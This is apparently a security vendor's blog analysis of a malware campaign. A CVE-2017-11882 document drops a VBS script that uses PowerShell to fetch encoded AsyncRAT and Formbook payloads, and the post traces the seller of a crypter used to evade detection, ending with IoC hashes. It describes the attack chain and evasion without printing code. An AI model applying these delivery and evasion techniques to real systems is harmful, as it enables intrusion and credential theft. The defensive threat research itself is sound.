The cyber security community has seen many incidents where threat actors try to evade detection by using anti-reversing techniques such as encryption using 3rd party cryptors available in underground forums. We would be analysing one such file which downloads an encoded PE file by using PowerShell in the form of .mp3 and a cryptor to evade detection.

The kill chain starts with a spam document, but instead of using a macro (which is a goto technique followed by threat actors), the doc file uses CVE-2017-11882 vulnerability to drop and execute a vbs script named FUDBypass.vbs. The  FUDBypass.vbs is responsible for spawning the PowerShell process as depicted in Figure 1 and 2 to download the encoded PE files from hxxp://www[.] as depicted in Figure 3 and 4.

Figure 1: FUDBypass.vbs
Figure 2: Decoded FUDBypass.vbs

Threat actors also reference people from the research community like FlorianRoth with the Twitter handle @Cyb3rops in Figure 2 and Malwarebytes and ZoneAlarm in Figure 1 as a way to challenge or trigger him to mention about it somewhere in social media so that the threat actor can become famous.

Figure 3: Encoded Formbook malware
Figure 4: Encoded AsyncRat module

There were 2 encoded PE files that were downloaded and after decoding them, we concluded that the 1st file was AsyncRAT v0.5.6B which is protected by a cryptor and the 2nd file was Formbook malware. Analysing each file in detail reveals some exciting information. 

File 1: AsyncRAT v0.5.6B

Even when the file is protected by a cryptor it fails to encrypt the pdb file path from where some valuable information can be extracted as shown in Figure 5.

Figure 5: AsyncRAT v0.5.6B

From Figure 5 it is evident that they have used AsyncRat. It also shows a username in the file path. So let’s try to see if we get anything from Twitter regarding that user name shown in Figure 5, since Twitter can be referred to as the gold mine for researchers. As suspected, the same user name was also reported by the “MalwareHunterTeam” as depicted in Figure 6 where they have referenced some twitter handles like Vitali Kremez (@VK_Intel), Malwrologist (@DissectMalware), Securisec (@securisec) for popularity.

Figure 6: Previous encounter of the same username

Next we  tried to google the username to see if we can get more information but the 1st page of the search result was a bummer. However, we decided to look at the 2nd page and we found an interesting thing. A funny meme “The best place to hide a dead body is page 2 of Google search results” came true in this instance.

What did we find in the 2nd page?

We got a reference to a Gitter page where this user was sharing a discord server as depicted in Figure 7 on the topic reverse engineering which led us to two more discord servers as depicted in Figure 8, where the  particular user was a founder and was selling a custom cryptor named Habib Crypter to other threat actors and script kiddies.

Figure 7: 2nd page of Google search

Figure 8: Two discord servers related to the same threat actor’s name

At this stage, we decided to spend few more days reading the chat here so as to find some more clues and we found that they were selling this cryptor in more than 3 domains like www[.]Habibprotector[.]com, www[.]Habibcrypter[.]com, pzw73897[.]cn etc., and this was also available via Google Drive cloud storage as depicted in Figure 9. We were also able to retrieve the Gmail address associated with that cloud storage.

Figure 9: Cryptor shared via cloud storage

Searching more, we landed on a security technology and social media forum called where the actor was selling the Habib Crypter for sometime as depicted in Figure 10. From his recent activity we can see from his comments posted that he was using AsyncRat for testing his cryptor as depicted in Figure 11, confirming our observation that the threat actor had access to AsyncRat’s client and server console from the very beginning.

Figure 10: Threat actor in
Figure 11: Threat actor’s comment on AsyncRAT usage

Apart from these, they were also using YouTube to advertise their product. In the video the threat actor encrypts AsyncRAT using Habib Crypter and instead of running it in a VM, he runs it in his host machine itself for the 1st time which was logged in the AsyncRAT C2 panel as depicted in Figure 12. From the image it is clear that the host machine username is that of the threat actor’s and the region is the United States. However, on looking at the left pane of the file explorer window the descriptions were in Spanish language.

Figure 12: YouTube video from the threat actor’s channel

The threat actor also has access to other RATs such as LuminosityLink RAT, NjRAT, Revenge RAT, etc., which can be found in AnyRun along with Habib Crypter.exe. Till now, we have seen how the threat actor has been advertising his product and also that he had access to some RATs but we do not know who the actor really is. If we take a close look at Figure 8, the admin is common in both the servers. We followed the YouTube link given in the admin’s discord profile and retrieved the Gmail address which was linked with the YouTube channel as depicted in Figure 13.

Figure 13: YouTube channel of the admin

The region of the admin according to the YouTube channel is Thailand. We found a post by the admin in tuts4you site and the post was related to cracking a program protected by Habib Crypter. He also mentioned that Habib is his good friend and that he needs to test the cryptor to see how strong it is as depicted in Figure 14. However, the region where the user has created his login is mentioned as South Korea.

Figure 14: Admin’s post in tuts4you

We again found a different YouTube channel which was advertising the Habib protector and the channel name is Abarcy product. In one of the videos captioned “How to Steal & Login Discord Token” that was uploaded by Abarcy product, if we take a closer look at the screen shot, he uses Abarcy autobuilder v2 by Prab#0389 and the Prab file folder was opened as depicted in Figure 15 which is the name of the admin we saw before.

Figure 15: Video from the channel Abarcy Product

Abarcy product also has a site hosted on (which is the easiest way to share all our links) which was using the image previously used by the admin and the link to Discord server was the same as that of the admin’s server.

Figure 16: Abarcy link and the image used

Still at the end of the day we will not be able to point fingers at a single person behind this file, but we do have 2 Gmail addresses; the one retrieved from Google Drive cloud storage and one from admin’s YouTube channel and we are sure that these files are linked to the persons behind these email addresses and/or they could also be a part of an even bigger group.

File 2: Formbook

The 2nd encoded file downloaded is Formbook which is responsible for stealing credentials from the infected system. The Formbook tries to load a DLL file from Mozilla Firefox in an attempt to steal the credentials which is depicted in Figure 17.

Figure 17: Process tree in courtesy of AnyRun

This Formbook module is similar to that of the file we have analysed in the previous blog where the Formbook was delivered from Google Drive cloud storage. The encoding method of the Formbook binary is exactly the same as that of the previous blog which was also found in the Gorgon APT campaign in the 2nd half of 2019.

As we always recommend, ignore emails from unknown sources and that you have not been expecting, thus avoiding becoming a victim of such malicious attacks. Use a reputed security product such as K7 Total Security to stay safe from any cyber threats.

Indicators of Compromise (IoCs)

HashFile NameK7 Detection Name
17650AA34ABEDB43C6D30CE0F5FB5FFCFUDBypass.vbsTrojan ( 0001140e1 )
63A69DE53AF8157C58CBCD59E9777C39AsyncRATTrojan ( 005672a71 )
7C711C9E227D455A131A223EEA423CBEDoc fileTrojan ( 0001140e1 )
BD3DD549F4739F56A5499E09B14C6466AsyncRATTrojan ( 005692101 )
BDBA127F936B91D20C1FAF48B9DD915EAsyncRATTrojan ( 005672a71 )
DDDFC3DF243681F83B7989CB695618D6FormbookTrojan ( 00536d121 )




Like what you're reading? Subscribe to our top stories.

If you want to subscribe to our monthly newsletter, please submit the form below.

    0 replies on “MP3 RATs in the hole”